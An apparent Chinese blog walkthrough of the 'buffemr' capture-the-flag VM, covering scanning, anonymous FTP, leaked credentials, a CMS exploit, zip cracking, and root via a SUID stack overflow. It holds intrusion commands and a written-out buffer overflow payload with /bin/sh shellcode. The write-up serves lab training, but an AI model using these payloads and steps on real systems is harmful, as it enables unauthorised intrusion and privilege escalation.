buffemr 靶机wp

主机探活

nmap -sP 192.168.159.0/24

目标靶机IP为:192.168.159.172


端口发现

nmap -sV -p- -A 192.168.159.172

在这里插入图片描述

目标靶机开放端口为:21、22、80端口


21端口

匿名登陆
ftp 192.168.159.172
# 用户名:anonymous		密码:空

在这里插入图片描述

成功登录进入ftp服务器


发现该服务器上有文件,都下载下来看看
在这里插入图片描述

wget -r ftp://192.168.159.172

在这里插入图片描述


信息收集

这里我初步想的是先找一找数据库配置文件,说不定用户名密码可以ssh直接登录

admin.php文件中找到了连接数据库的函数,找到其中的变量和包含的文件

在这里插入图片描述

在文件夹中寻找包含的文件sqlconfug.php

在这里插入图片描述

查看,发现连接数据库的用户名和密码

在这里插入图片描述

在这里插入图片描述

找到了,但是无法连接,寄


然后继续查看文件,发现有一个tests目录,进去后发现其内存在一组账号密码

在这里插入图片描述

admin:Monster123


80端口

我们在获得的网站源码中找到了一组用户名密码,尝试登陆网站

在这里插入图片描述


修改配置文件时发现改不了。。。

在这里插入图片描述


但是发现了这个cms的版本信息

在这里插入图片描述

尝试直接利用本地漏洞库中文件

在这里插入图片描述

其中前两个是 manage_site_files,猜测就是我刚才试的,估计不行

尝试了一下确实无法获得shell


尝试最后一个脚本,成功获得shell

在这里插入图片描述

在这里插入图片描述


提权

信息收集

在经过了 setuid 、sudo、计划任务等常规流程没有找到可以利用的地方后;在进行信息收集时发现在/var目录下存在一个user.zip 文件

在这里插入图片描述


文件下载

由于这个文件只可读,属主属组都是root,放不到 web 目录下,无法下载

在这里插入图片描述


我们尝试使用 python 自带的http服务:

python3 -m http.server 8888		#python2没装http,3装了,使用python3

在这里插入图片描述


下载后查看,发现存在密码,使用fcrackzip尝试爆破密码

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user.zip 

没成功。。。


数据库信息收集

使用我们之前得到的数据库用户名与密码尝试登入数据库

在这里插入图片描述


进行信息收集

show databases;
use user_info;
show tables;
select * from ENCKEYS;

在这里插入图片描述

c2FuM25jcnlwdDNkCg==


看起来像base64,进行解密,获得一个密码:san3ncrypt3d

在这里插入图片描述

尝试解压缩,密码是错的。。。

在这里插入图片描述


然后没办法了,上网搜教程,发现直接用加密的密文解密就行。。。太tmd苟了。。。

在这里插入图片描述

解密后获取一组用户名与密码:buffemr Iamgr00t


ssh成功连接

在这里插入图片描述


buddmer用户

setuid

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

一眼看到一个可疑文件


缓冲区溢出漏洞

strings查看它的大概内容

在这里插入图片描述

strcpy函数,经典存在栈溢出漏洞的函数;而且没有什么别的看起来可以利用的了,故尝试使用栈溢出获取系统权限


尝试运行,发现输入字符串过长确实会产生栈溢出

在这里插入图片描述


与上一篇关于缓冲区溢出漏洞靶机driftingblues 9相同,先生成 测试用字符串,再进入 gdb 调试,获得一个地址,最后计算出偏移量(不发生溢出的字符串长度)

在这里插入图片描述

在这里插入图片描述


查看esp寄存器起始地址:x/50wx $esp

在这里插入图片描述


构造攻击载荷(具体看driftingblues 9靶机文章):

$(python -c ‘print(“A”*512 + “\x30\xd3\xff\xff” + “\x90” * 100 + “\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”)’)

这里我上次driftingblues 9靶机使用的提权载荷没有成功,修改成另一个载荷才成功

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

成功获取 root 权限!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值